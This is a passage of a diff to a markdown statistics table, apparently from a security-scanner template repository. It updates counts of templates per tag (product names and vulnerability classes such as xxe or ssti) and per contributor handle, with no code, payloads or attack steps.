| | | | -| rails | 8 | impramodsargar | 3 | | | | | | | -| gitlab | 8 | _generic_human_ | 3 | | | | | | | -| ftp | 8 | tess | 3 | | | | | | | -| cnvd | 8 | z3bd | 3 | | | | | | | -| xxe | 7 | mavericknerd | 3 | | | | | | | -| cve2009 | 7 | x1m_martijn | 2 | | | | | | | -| nginx | 7 | shifacyclewala | 2 | | | | | | | -| login | 7 | udit_thakkur | 2 | | | | | | | -| joomla | 7 | swissky | 2 | | | | | | | -| vmware | 7 | kiblyn11 | 2 | | | | | | | -| scada | 7 | alifathi-h1 | 2 | | | | | | | -| backup | 6 | manas_harsh | 2 | | | | | | | -| rconfig | 6 | bp0lr | 2 | | | | | | | -| coldfusion | 6 | zomsop82 | 2 | | | | | | | -| dell | 6 | 0xsapra | 2 | | | | | | | -| cms | 6 | joeldeleep | 2 | | | | | | | -| api | 6 | bsysop | 2 | | | | | | | -| google | 6 | random-robbie | 2 | | | | | | | -| citrix | 6 | ehsahil | 2 | | | | | | | -| jetty | 6 | 0xprial | 2 | | | | | | | -| fileupload | 5 | moritz nentwig | 2 | | | | | | | -| drupal | 5 | bing0o | 2 | | | | | | | -| netgear | 5 | ree4pwn | 2 | | | | | | | -| phpmyadmin | 5 | pxmme1337 | 2 | | | | | | | -| lucee | 5 | vavkamil | 2 | | | | | | | -| solr | 5 | davidmckennirey | 2 | | | | | | | -| ruijie | 5 | 0xrudra | 2 | | | | | | | -| ssti | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| files | 5 | foulenzer | 2 | | | | | | | +| android | 12 | iamnoooob | 4 | | | | | | | +| dns | 11 | xelkomy | 4 | | | | | | | +| cve2012 | 11 | nodauf | 4 | | | | | | | +| zoho | 11 | elsfa7110 | 4 | | | | | | | +| springboot | 11 | github.com/its0x08 | 4 | | | | | | | +| cve2011 | 11 | rootxharsh | 4 | | | | | | | +| cve2014 | 10 | e_schultze_ | 4 | | | | | | | +| devops | 10 | impramodsargar | 3 | | | | | | | +| jenkins | 10 | z3bd | 3 | | | | | | | +| cve2013 | 10 | mavericknerd | 3 | | | | | | | +| php | 10 | binaryfigments | 3 | | | | | | | +| dlink | 10 | tess | 3 | | | | | | | +| magento | 9 | dudez | 3 | | | | | | | +| gitlab | 8 | shine | 3 | | | | | | | +| ftp | 8 | yash anand @yashanand155 | 3 | | | | | | | +| rails | 8 | fyoorer | 3 | | | | | | | +| aws | 8 | f1tz | 3 | | | | | | | +| airflow | 8 | thomas_from_offensity | 3 | | | | | | | +| cnvd | 8 | _generic_human_ | 3 | | | | | | | +| router | 8 | jarijaas | 3 | | | | | | | +| joomla | 7 | 0w4ys | 3 | | | | | | | +| nginx | 7 | ree4pwn | 2 | | | | | | | +| scada | 7 | joeldeleep | 2 | | | | | | | +| xxe | 7 | 0xsapra | 2 | | | | | | | +| vmware | 7 | incogbyte | 2 | | | | | | | +| coldfusion | 6 | x1m_martijn | 2 | | | | | | | +| jetty | 6 | vavkamil | 2 | | | | | | | +| rconfig | 6 | dheerajmadhukar | 2 | | | | | | | +| google | 6 | amsda | 2 | | | | | | | +| backup | 6 | fabaff | 2 | | | | | | | +| citrix | 6 | 0xrudra | 2 | | | | | | | +| api | 6 | 0xcrypto | 2 | | | | | | | +| cms | 6 | hetroublemakr | 2 | | | | | | | +| lucee | 5 | koti2 | 2 | | | | | | | +| java | 5 | 0xelkomy | 2 | | | | | | | +| dedecms | 5 | davidmckennirey | 2 | | | | | | | +| ruijie | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| drupal | 5 | bp0lr | 2 | | | | | | | +| django | 5 | udit_thakkur | 2 | | | | | | | +| dell | 5 | nkxxkn | 2 | | | | | | | +| circarlife | 5 | bing0o | 2 | | | | | | | +| ibm | 5 | bsysop | 2 | | | | | | | +| ssti | 5 | ehsahil | 2 | | | | | | | +| confluence | 5 | gevakun | 2 | | | | | | | +| cve2009 | 5 | lotusdll | 2 | | | | | | | +| netgear | 5 | lu4nx | 2 | | | | | | | +| login | 5 | random-robbie | 2 | | | | | | | +| headless | 5 | randomrobbie | 2 | | | | | | | +| laravel | 5 | manas_harsh | 2 | | | | | | | +| solr | 5 | moritz nentwig | 2 | | | | | | | | iis | 5 | unstabl3 | 2 | | | | | | | -| headless | 5 | lu4nx | 2 | | | | | | | -| java | 5 | afaq | 2 | | | | | | | -| ibm | 5 | amsda | 2 | | | | | | | -| circarlife | 5 | hetroublemakr | 2 | | | | | | | -| confluence | 5 | fabaff | 2 | | | | | | | -| django | 5 | nkxxkn | 2 | | | | | | | -| dedecms | 5 | hahwul | 2 | | | | | | | -| laravel | 5 | koti2 | 2 | | | | | | | -| asp | 4 | incogbyte | 2 | | | | | | | -| jolokia | 4 | 0xelkomy | 2 | | | | | | | -| artifactory | 4 | randomrobbie | 2 | | | | | | | -| thinkphp | 4 | emenalf | 2 | | | | | | | -| moodle | 4 | gevakun | 2 | | | | | | | -| magmi | 4 | lotusdll | 2 | | | | | | | +| phpmyadmin | 5 | afaq | 2 | | | | | | | +| files | 5 | pxmme1337 | 2 | | | | | | | +| thinkphp | 4 | 0xprial | 2 | | | | | | | +| hongdian | 4 | emenalf | 2 | | | | | | | +| solarwinds | 4 | zomsop82 | 2 | | | | | | | +| magmi | 4 | shifacyclewala | 2 | | | | | | | | tomcat | 4 | w4cky_ | 2 | | | | | | | -| thinkcmf | 4 | dheerajmadhukar | 2 | | | | | | | -| webserver | 4 | 0xcrypto | 2 | | | | | | | -| vpn | 4 | absshax | 1 | | | | | | | -| docker | 4 | patralos | 1 | | | | | | | -| deserialization | 4 | jeya seelan | 1 | | | | | | | -| elastic | 4 | wabafet | 1 | | | | | | | -| crlf | 4 | andysvints | 1 | | | | | | | -| solarwinds | 4 | sullo | 1 | | | | | | | -| samsung | 4 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| traversal | 4 | undefl0w | 1 | | | | | | | -| nodejs | 4 | petruknisme | 1 | | | | | | | -| hongdian | 4 | philippdelteil | 1 | | | | | | | -| r-seenet | 3 | _darrenmartyn | 1 | | | | | | | -| fanruan | 3 | yashanand155 | 1 | | | | | | | -| ebs | 3 | micha3lb3n | 1 | | | | | | | -| log | 3 | willd96 | 1 | | | | | | | -| lfr | 3 | _harleo | 1 | | | | | | | -| fpd | 3 | sushant kamble | 1 | | | | | | | -| | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | | -| cve2010 | 3 | fopina | 1 | | | | | | | -| mongodb | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| ofbiz | 3 | ldionmarcil | 1 | | | | | | | -| openssh | 3 | daviey | 1 | | | | | | | -| bypass | 3 | shreyapohekar | 1 | | | | | | | -| caucho | 3 | manuelbua | 1 | | | | | | | -| hp | 3 | j33n1k4 | 1 | | | | | | | -| oa | 3 | flag007 | 1 | | | | | | | -| amazon | 3 | sicksec | 1 | | | | | | | -| nosqli | 3 | nytr0gen | 1 | | | | | | | -| nacos | 3 | 52971 | 1 | | | | | | | -| kubernetes | 3 | rojanrijal | 1 | | | | | | | -| kafka | 3 | rtcms | 1 | | | | | | | -| ssh | 3 | cookiehanhoan | 1 | | | | | | | -| itop | 3 | revblock | 1 | | | | | | | -| git | 3 | un-fmunozs | 1 | | | | | | | -| zabbix | 3 | luskabol | 1 | | | | | | | -| vbulletin | 3 | aceseven (digisec360) | 1 | | | | | | | -| resin | 3 | makyotox | 1 | | | | | | | -| printer | 3 | d0rkerdevil | 1 | | | | | | | -| bitrix | 3 | akash.c | 1 | | | | | | | -| springcloud | 3 | notsoevilweasel | 1 | | | | | | | -| slack | 3 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| windows | 3 | furkansenan | 1 | | | | | | | -| targa | 3 | rodnt | 1 | | | | | | | -| terramaster | 3 | kabirsuda | 1 | | | | | | | -| backups | 3 | sshell | 1 | | | | | | | -| grafana | 3 | g4l1t0 and @convisoappsec | 1 | | | | | | | -| microstrategy | 3 | @github.com/defr0ggy | 1 | | | | | | | -| service | 2 | abison_binoy | 1 | | | | | | | -| rockmongo | 2 | sy3omda | 1 | | | | | | | -| keycloak | 2 | bolli95 | 1 | | | | | | | -| yapi | 2 | shelld3v | 1 | | | | | | | -| httpd | 2 | c3l3si4n | 1 | | | | | | | -| injection | 2 | r3naissance | 1 | | | | | | | -| jellyfin | 2 | bjhulst | 1 | | | | | | | -| showdoc | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| smtp | 2 | smaranchand | 1 | | | | | | | -| status | 2 | b4uh0lz | 1 | | | | | | | -| nextjs | 2 | blckraven | 1 | | | | | | | -| intrusive | 2 | 0xtavian | 1 | | | | | | | -| idrac | 2 | yavolo | 1 | | | | | | | -| oauth | 2 | luci | 1 | | | | | | | -| leak | 2 | whynotke | 1 | | | | | | | -| igs | 2 | co0nan | 1 | | | | | | | -| linkerd | 2 | mohammedsaneem | 1 | | | | | | | -| webcam | 2 | johnk3r | 1 | | | | | | | -| phpcollab | 2 | 0xteles | 1 | | | | | | | -| splunk | 2 | exploitation | 1 | | | | | | | -| strapi | 2 | thevillagehacker | 1 | | | | | | | -| pega | 2 | ilovebinbash | 1 | | | | | | | -| shellshock | 2 | streetofhackerr007 | 1 | | | | | | | -| spark | 2 | becivells | 1 | | | | | | | -| fortios | 2 | naglinagli | 1 | | | | | | | -| vrealize | 2 | idealphase | 1 | | | | | | | -| sonarqube | 2 | arcc | 1 | | | | | | | -| hashicorp | 2 | b0yd | 1 | | | | | | | -| xxljob | 2 | mah3sec_ | 1 | | | | | | | -| kibana | 2 | zhenwarx | 1 | | | | | | | -| telerik | 2 | deena | 1 | | | | | | | -| kevinlab | 2 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| ecology | 2 | juicypotato1 | 1 | | | | | | | -| frp | 2 | remonsec | 1 | | | | | | | -| dos | 2 | gboddin | 1 | | | | | | | -| couchdb | 2 | vsh00t | 1 | | | | | | | -| smb | 2 | s1r1u5_ | 1 | | | | | | | -| prometheus | 2 | ringo | 1 | | | | | | | -| natshell | 2 | iampritam | 1 | | | | | | | -| mida | 2 | dawid czarnecki | 1 | | | | | | | -| glassfish | 2 | aresx | 1 | | | | | | | -| nexus | 2 | its0x08 | 1 | | | | | | | -| wordfence | 2 | jteles | 1 | | | | | | | -| ucmdb | 2 | bernardo rodrigues | 1 | | | | | | | +| samsung | 4 | foulenzer | 2 | | | | | | | +| jolokia | 4 | swissky | 2 | | | | | | | +| webserver | 4 | kiblyn11 | 2 | | | | | | | +| elastic | 4 | thevillagehacker | 1 | | | | | | | +| traversal | 4 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| cve2008 | 2 | retr0 | 1 | | | | | | | -| jsf | 2 | pdp | 1 | | | | | | | -| sonicwall | 2 | affix | 1 | | | | | | | -| cve2007 | 2 | tirtha_mandal | 1 | | | | | | | -| flir | 2 | soyelmago | 1 | | | | | | | -| chiyu | 2 | schniggie | 1 | | | | | | | -| kentico | 2 | chron0x | 1 | | | | | | | -| mail | 2 | qlkwej | 1 | | | | | | | -| jeedom | 2 | berkdusunur | 1 | | | | | | | -| icewarp | 2 | apt-mirror | 1 | | | | | | | -| horde | 2 | mubassirpatel | 1 | | | | | | | -| nagios | 2 | hakluke | 1 | | | | | | | -| zhiyuan | 2 | zandros0 | 1 | | | | | | | -| odoo | 2 | taielab | 1 | | | | | | | -| jboss | 2 | knassar702 | 1 | | | | | | | -| emerge | 2 | regala_ | 1 | | | | | | | -| maian | 2 | divya_mudgal | 1 | | | | | | | -| hpe | 2 | tim_koopmans | 1 | | | | | | | -| huawei | 2 | th3.d1p4k | 1 | | | | | | | -| rstudio | 2 | sickwell | 1 | | | | | | | -| plesk | 2 | gal nagli | 1 | | | | | | | -| bigip | 2 | raesene | 1 | | | | | | | -| hjtcloud | 2 | kurohost | 1 | | | | | | | -| paloalto | 2 | 0h1in9e | 1 | | | | | | | -| microsoft | 2 | ohlinge | 1 | | | | | | | -| globalprotect | 2 | shifacyclewla | 1 | | | | | | | -| trixbox | 2 | alph4byt3 | 1 | | | | | | | -| chamilo | 2 | 0ut0fb4nd | 1 | | | | | | | -| saltstack | 2 | thezakman | 1 | | | | | | | -| activemq | 2 | ahmed sherif | 1 | | | | | | | -| openfire | 2 | pudsec | 1 | | | | | | | -| akamai | 2 | dogasantos | 1 | | | | | | | -| rockethchat | 2 | bernardofsr | 1 | | | | | | | -| openam | 2 | defr0ggy | 1 | | | | | | | -| proxy | 2 | ooooooo_q | 1 | | | | | | | -| waf | 2 | toufik airane | 1 | | | | | | | -| voipmonitor | 2 | hanlaomo | 1 | | | | | | | -| github | 2 | elder tao | 1 | | | | | | | -| cache | 2 | elmahdi | 1 | | | | | | | -| seeyon | 2 | alperenkesk | 1 | | | | | | | -| sharepoint | 2 | omarkurt | 1 | | | | | | | -| pacsone | 1 | huowuzhao | 1 | | | | | | | -| ambari | 1 | @dwisiswant0 | 1 | | | | | | | -| dotnet | 1 | vzamanillo | 1 | | | | | | | -| dotclear | 1 | noamrathaus | 1 | | | | | | | -| springframework | 1 | yashgoti | 1 | | | | | | | -| akkadian | 1 | geraldino2 | 1 | | | | | | | -| openx | 1 | fmunozs | 1 | | | | | | | -| upload | 1 | andirrahmani1 | 1 | | | | | | | -| mongoshake | 1 | bad5ect0r | 1 | | | | | | | -| acontent | 1 | johnjhacking | 1 | | | | | | | -| ricoh | 1 | mhdsamx | 1 | | | | | | | -| rfi | 1 | ratnadip gajbhiye | 1 | | | | | | | -| fuelcms | 1 | alex | 1 | | | | | | | -| hadoop | 1 | akshansh | 1 | | | | | | | -| bruteforce | 1 | kareemse1im | 1 | | | | | | | -| hiboss | 1 | _c0wb0y_ | 1 | | | | | | | -| zte | 1 | kishore krishna (sillydaddy) | 1 | | | | | | | -| razor | 1 | j3ssie/geraldino2 | 1 | | | | | | | -| xmlchart | 1 | kba@sogeti_esec | 1 | | | | | | | -| visionhub | 1 | 0xrod | 1 | | | | | | | -| cors | 1 | ipanda | 1 | | | | | | | -| beanshell | 1 | me9187 | 1 | | | | | | | -| webmodule-ee | 1 | ajaysenr | 1 | | | | | | | -| ecom | 1 | | | | | | | | | -| panabit | 1 | | | | | | | | | -| openemr | 1 | | | | | | | | | -| zimbra | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| linksys | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| ilo4 | 1 | | | | | | | | | -| embedthis | 1 | | | | | | | | | -| fastapi | 1 | | | | | | | | | -| clockwatch | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| webadmin | 1 | | | | | | | | | -| mysql | 1 | | | | | | | | | -| vsftpd | 1 | | | | | | | | | -| wavlink | 1 | | | | | | | | | -| alerta | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| redwood | 1 | | | | | | | | | -| ssl | 1 | | | | | | | | | -| wuzhicms | 1 | | | | | | | | | -| monitorr | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| redis | 1 | | | | | | | | | -| resourcespace | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| glances | 1 | | | | | | | | | -| cve2005 | 1 | | | | | | | | | -| mailchimp | 1 | | | | | | | | | -| discourse | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| netsweeper | 1 | | | | | | | | | +| vpn | 4 | sshell | 1 | | | | | | | +| artifactory | 4 | gal nagli | 1 | | | | | | | +| fileupload | 4 | mubassirpatel | 1 | | | | | | | +| nodejs | 4 | furkansenan | 1 | | | | | | | +| moodle | 4 | un-fmunozs | 1 | | | | | | | +| crlf | 4 | thezakman | 1 | | | | | | | +| asp | 4 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| docker | 4 | j33n1k4 | 1 | | | | | | | +| thinkcmf | 4 | kareemse1im | 1 | | | | | | | +| grafana | 3 | divya_mudgal | 1 | | | | | | | +| springcloud | 3 | 0xrod | 1 | | | | | | | +| slack | 3 | naglinagli | 1 | | | | | | | +| microstrategy | 3 | @dwisiswant0 | 1 | | | | | | | +| nacos | 3 | _darrenmartyn | 1 | | | | | | | +| ofbiz | 3 | johnjhacking | 1 | | | | | | | +| windows | 3 | bad5ect0r | 1 | | | | | | | +| nosqli | 3 | regala_ | 1 | | | | | | | +| backups | 3 | geraldino2 | 1 | | | | | | | +| fpd | 3 | smaranchand | 1 | | | | | | | +| kubernetes | 3 | wabafet | 1 | | | | | | | +| hp | 3 | gboddin | 1 | | | | | | | +| ebs | 3 | makyotox | 1 | | | | | | | +| targa | 3 | chron0x | 1 | | | | | | | +| ssh | 3 | g4l1t0 and @convisoappsec | 1 | | | | | | | +| vbulletin | 3 | akash.c | 1 | | | | | | | +| oa | 3 | fmunozs | 1 | | | | | | | +| r-seenet | 3 | daviey | 1 | | | | | | | +| amazon | 3 | blckraven | 1 | | | | | | | +| resin | 3 | alex | 1 | | | | | | | +| caucho | 3 | knassar702 | 1 | | | | | | | +| cve2010 | 3 | remonsec | 1 | | | | | | | +| mongodb | 3 | noamrathaus | 1 | | | | | | | +| fanruan | 3 | soyelmago | 1 | | | | | | | +| deserialization | 3 | shreyapohekar | 1 | | | | | | | +| log | 3 | ohlinge | 1 | | | | | | | +| git | 3 | cookiehanhoan | 1 | | | | | | | +| openssh | 3 | retr0 | 1 | | | | | | | +| terramaster | 3 | 0xtavian | 1 | | | | | | | +| bypass | 3 | bolli95 | 1 | | | | | | | +| kafka | 3 | ldionmarcil | 1 | | | | | | | +| lfr | 3 | fopina | 1 | | | | | | | +| printer | 3 | jeya seelan | 1 | | | | | | | +| frp | 2 | nytr0gen | 1 | | | | | | | +| jboss | 2 | rtcms | 1 | | | | | | | +| ucmdb | 2 | elmahdi | 1 | | | | | | | +| webcam | 2 | defr0ggy | 1 | | | | | | | +| plesk | 2 | c3l3si4n | 1 | | | | | | | +| microsoft | 2 | vsh00t | 1 | | | | | | | +| proxy | 2 | exploitation | 1 | | | | | | | +| trixbox | 2 | andysvints | 1 | | | | | | | +| paloalto | 2 | 52971 | 1 | | | | | | | +| xxljob | 2 | mah3sec_ | 1 | | | | | | | +| keycloak | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| smb | 2 | sickwell | 1 | | | | | | | +| linkerd | 2 | dawid czarnecki | 1 | | | | | | | +| natshell | 2 | affix | 1 | | | | | | | +| jellyfin | 2 | yashanand155 | 1 | | | | | | | +| globalprotect | 2 | mhdsamx | 1 | | | | | | | +| httpd | 2 | whynotke | 1 | | | | | | | +| hjtcloud | 2 | bjhulst | 1 | | | | | | | +| sonarqube | 2 | d0rkerdevil | 1 | | | | | | | +| cache | 2 | raesene | 1 | | | | | | | +| showdoc | 2 | undefl0w | 1 | | | | | | | +| vrealize | 2 | sushant kamble | 1 | | | | | | | +| | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | | +| dos | 2 | ipanda | 1 | | | | | | | +| kibana | 2 | co0nan | 1 | | | | | | | +| mida | 2 | patralos | 1 | | | | | | | +| oauth | 2 | sicksec | 1 | | | | | | | +| fortios | 2 | hakluke | 1 | | | | | | | +| rstudio | 2 | luci | 1 | | | | | | | +| strapi | 2 | ahmed sherif | 1 | | | | | | | +| cve2008 | 2 | streetofhackerr007 | 1 | | | | | | | +| shellshock | 2 | rojanrijal | 1 | | | | | | | +| openfire | 2 | 0ut0fb4nd | 1 | | | | | | | +| intrusive | 2 | alph4byt3 | 1 | | | | | | | +| kentico | 2 | b0yd | 1 | | | | | | | +| emerge | 2 | hanlaomo | 1 | | | | | | | +| kevinlab | 2 | revblock | 1 | | | | | | | +| hpe | 2 | sullo | 1 | | | | | | | +| mail | 2 | andirrahmani1 | 1 | | | | | | | +| ecology | 2 | sy3omda | 1 | | | | | | | +| yapi | 2 | kabirsuda | 1 | | | | | | | +| idrac | 2 | alifathi-h1 | 1 | | | | | | | +| splunk | 2 | idealphase | 1 | | | | | | | +| cve2007 | 2 | kba@sogeti_esec | 1 | | | | | | | +| rockmongo | 2 | deena | 1 | | | | | | | +| openam | 2 | taielab | 1 | | | | | | | +| zhiyuan | 2 | alperenkesk | 1 | | | | | | | +| seeyon | 2 | micha3lb3n | 1 | | | | | | | +| wordfence | 2 | shelld3v | 1 | | | | | | | +| smtp | 2 | becivells | 1 | | | | | | | +| odoo | 2 | s1r1u5_ | 1 | | | | | | | +| service | 2 | toufik airane | 1 | | | | | | | +| waf | 2 | luskabol | 1 | | | | | | | +| nagios | 2 | arcc | 1 | | | | | | | +| rockethchat | 2 | schniggie | 1 | | | | | | | +| zabbix | 2 | th3.d1p4k | 1 | | | | | | | +| chiyu | 2 | 0xteles | 1 | | | | | | | +| couchdb | 2 | _harleo | 1 | | | | | | | +| prometheus | 2 | pdp | 1 | | | | | | | +| injection | 2 | kurohost | 1 | | | | | | | +| telerik | 2 | notsoevilweasel | 1 | | | | | | | +| chamilo | 2 | ringo | 1 | | | | | | | +| nexus | 2 | pudsec | 1 | | | | | | | +| bigip | 2 | omarkurt | 1 | | | | | | | +| huawei | 2 | flag007 | 1 | | | | | | | +| glassfish | 2 | dogasantos | 1 | | | | | | | +| leak | 2 | vzamanillo | 1 | | | | | | | +| voipmonitor | 2 | yavolo | 1 | | | | | | | +| bitrix | 2 | @github.com/defr0ggy | 1 | | | | | | | +| pega | 2 | juicypotato1 | 1 | | | | | | | +| igs | 2 | ilovebinbash | 1 | | | | | | | +| maian | 2 | iampritam | 1 | | | | | | | +| spark | 2 | abison_binoy | 1 | | | | | | | +| hashicorp | 2 | 0h1in9e | 1 | | | | | | | +| saltstack | 2 | apt-mirror | 1 | | | | | | | +| icewarp | 2 | yashgoti | 1 | | | | | | | +| activemq | 2 | willd96 | 1 | | | | | | | +| sonicwall | 2 | absshax | 1 | | | | | | | +| sharepoint | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| flir | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | +| nextjs | 2 | tirtha_mandal | 1 | | | | | | | +| redcap | 1 | _c0wb0y_ | 1 | | | | | | | +| mantis | 1 | r3naissance | 1 | | | | | | | +| npm | 1 | aceseven (digisec360) | 1 | | | | | | | +| anchorcms | 1 | j3ssie/geraldino2 | 1 | | | | | | | +| k8s | 1 | bernardofsr | 1 | | | | | | | +| shopxo | 1 | johnk3r | 1 | | | | | | | +| alibaba | 1 | rodnt | 1 | | | | | | | +| axis | 1 | akshansh | 1 | | | | | | | +| jsf | 1 | jteles | 1 | | | | | | | +| servicenow | 1 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| expn | 1 | ratnadip gajbhiye | 1 | | | | | | | +| sco | 1 | its0x08 | 1 | | | | | | | +| h3c-imc | 1 | mohammedsaneem | 1 | | | | | | | +| powercreator | 1 | shifacyclewla | 1 | | | | | | | +| haproxy | 1 | aresx | 1 | | | | | | | +| gateone | 1 | ooooooo_q | 1 | | | | | | | +| plugin | 1 | zandros0 | 1 | | | | | | | +| duomicms | 1 | ajaysenr | 1 | | | | | | | +| addpac | 1 | berkdusunur | 1 | | | | | | | +| blind | 1 | qlkwej | 1 | | | | | | | +| netsweeper | 1 | petruknisme | 1 | | | | | | | +| javamelody | 1 | tim_koopmans | 1 | | | | | | | +| wiki | 1 | manuelbua | 1 | | | | | | | +| faraday | 1 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| ec2 | 1 | zhenwarx | 1 | | | | | | | +| mongoshake | 1 | b4uh0lz | 1 | | | | | | | | xiuno | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| wp-theme | 1 | | | | | | | | | -| sureline | 1 | | | | | | | | | -| blind | 1 | | | | | | | | | -| st | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| fortigates | 1 | | | | | | | | | -| proftpd | 1 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| sceditor | 1 | | | | | | | | | -| manageengine | 1 | | | | | | | | | -| soar | 1 | | | | | | | | | -| ems | 1 | | | | | | | | | -| spring | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| expose | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| lighttpd | 1 | | | | | | | | | -| maccmsv10 | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| spip | 1 | | | | | | | | | -| blue-ocean | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | -| ssltls | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| wondercms | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| scs | 1 | | | | | | | | | -| socomec | 1 | | | | | | | | | -| mongo | 1 | | | | | | | | | -| sgp | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| gitlist | 1 | | | | | | | | | -| haproxy | 1 | | | | | | | | | -| redcap | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| etouch | 1 | | | | | | | | | -| zzzcms | 1 | | | | | | | | | -| accela | 1 | | | | | | | | | -| wamp | 1 | | | | | | | | | -| eyou | 1 | | | | | | | | | -| nps | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| linkedin | 1 | | | | | | | | | -| sitecore | 1 | | | | | | | | | -| clave | 1 | | | | | | | | | -| vnc | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| csrf | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| pyramid | 1 | | | | | | | | | -| qcubed | 1 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| froxlor | 1 | | | | | | | | | -| email | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| drone | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| cse | 1 | | | | | | | | | -| druid | 1 | | | | | | | | | -| nuxeo | 1 | | | | | | | | | -| ec2 | 1 | | | | | | | | | -| xff | 1 | | | | | | | | | -| grav | 1 | | | | | | | | | -| scimono | 1 | | | | | | | | | -| javamelody | 1 | | | | | | | | | -| dnssec | 1 | | | | | | | | | -| firebase | 1 | | | | | | | | | -| symfony | 1 | | | | | | | | | -| mcafee | 1 | | | | | | | | | -| centreon | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| opensns | 1 | | | | | | | | | -| cerebro | 1 | | | | | | | | | -| enum | 1 | | | | | | | | | -| metinfo | 1 | | | | | | | | | -| pgadmin | 1 | | | | | | | | | -| sangfor | 1 | | | | | | | | | -| woocomernce | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| lansweeper | 1 | | | | | | | | | -| mpsec | 1 | | | | | | | | | -| k8s | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | -| cloudflare | 1 | | | | | | | | | -| xvr | 1 | | | | | | | | | -| codemeter | 1 | | | | | | | | | -| opm | 1 | | | | | | | | | -| addpac | 1 | | | | | | | | | -| smartsense | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| default | 1 | | | | | | | | | -| sidekiq | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | -| interlib | 1 | | | | | | | | | -| npm | 1 | | | | | | | | | -| bitly | 1 | | | | | | | | | -| zmanda | 1 | | | | | | | | | -| auth | 1 | | | | | | | | | -| flink | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | -| tapestry | 1 | | | | | | | | | -| circontrol | 1 | | | | | | | | | -| iptime | 1 | | | | | | | | | -| aspnuke | 1 | | | | | | | | | -| gespage | 1 | | | | | | | | | -| gateone | 1 | | | | | | | | | -| episerver | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| avtech | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| mara | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| wiki | 1 | | | | | | | | | -| keenetic | 1 | | | | | | | | | -| finereport | 1 | | | | | | | | | -| moinmoin | 1 | | | | | | | | | -| zend | 1 | | | | | | | | | -| azure | 1 | | | | | | | | | -| bigbluebutton | 1 | | | | | | | | | -| hasura | 1 | | | | | | | | | -| chevereto | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| servicenow | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| phalcon | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| acexy | 1 | | | | | | | | | -| lg-nas | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | -| sprintful | 1 | | | | | | | | | -| liferay | 1 | | | | | | | | | -| openstack | 1 | | | | | | | | | -| lancom | 1 | | | | | | | | | -| mdb | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | -| anchorcms | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| default-login | 1 | | | | | | | | | -| ruckus | 1 | | | | | | | | | -| setup | 1 | | | | | | | | | -| yii | 1 | | | | | | | | | -| panos | 1 | | | | | | | | | -| lutron | 1 | | | | | | | | | -| upnp | 1 | | | | | | | | | -| 2014 | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| pulsesecure | 1 | | | | | | | | | -| node-red-dashboard | 1 | | | | | | | | | -| nexusdb | 1 | | | | | | | | | -| 